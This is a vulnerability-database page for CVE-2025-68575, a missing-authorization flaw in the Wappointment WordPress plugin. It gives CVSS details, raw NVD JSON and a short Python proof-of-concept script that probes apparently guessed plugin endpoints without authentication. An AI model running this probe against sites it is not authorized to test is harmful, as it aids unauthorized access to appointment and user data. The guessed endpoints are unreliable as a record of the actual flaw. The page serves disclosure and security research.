Security Vulnerability Report
中文
CVE-2025-68575 CVSS 5.3 MEDIUM

CVE-2025-68575

Published: 2025-12-24 13:16:25
Last Modified: 2026-04-27 19:16:32

Description

Missing Authorization vulnerability in Wappointment team Wappointment wappointment allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Wappointment: from n/a through <= 2.7.6.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Wappointment <= 2.7.6

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests # CVE-2025-68575 PoC - Missing Authorization in Wappointment Plugin # Target: WordPress site with Wappointment plugin <= 2.7.6 TARGET_URL = "http://target-wordpress-site.com" def check_vulnerability(): """ Check if the target is vulnerable to CVE-2025-68575 This vulnerability allows unauthorized access to sensitive functions """ # Try to access admin-level functions without authentication endpoints = [ "/wp-json/wappointment/v1/settings", "/wp-json/wappointment/v1/appointments", "/wp-json/wappointment/v1/users", "/wp-admin/admin-ajax.php?action=wappointment_get_data" ] for endpoint in endpoints: url = TARGET_URL + endpoint try: response = requests.get(url, timeout=10) # If we get a 200 response without auth, the site is vulnerable if response.status_code == 200: print(f"[+] Potential vulnerability found at: {url}") print(f"[+] Response: {response.text[:200]}") except requests.RequestException as e: print(f"[-] Error accessing {url}: {e}") if __name__ == "__main__": print("CVE-2025-68575 Wappointment Authorization Bypass PoC") check_vulnerability()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-68575", "sourceIdentifier": "[email protected]", "published": "2025-12-24T13:16:24.540", "lastModified": "2026-04-27T19:16:32.227", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in Wappointment team Wappointment wappointment allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Wappointment: from n/a through <= 2.7.6."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/wappointment/vulnerability/wordpress-wappointment-plugin-2-7-2-broken-access-control-vulnerability?_s_id=cve", "source": "[email protected]"}]}}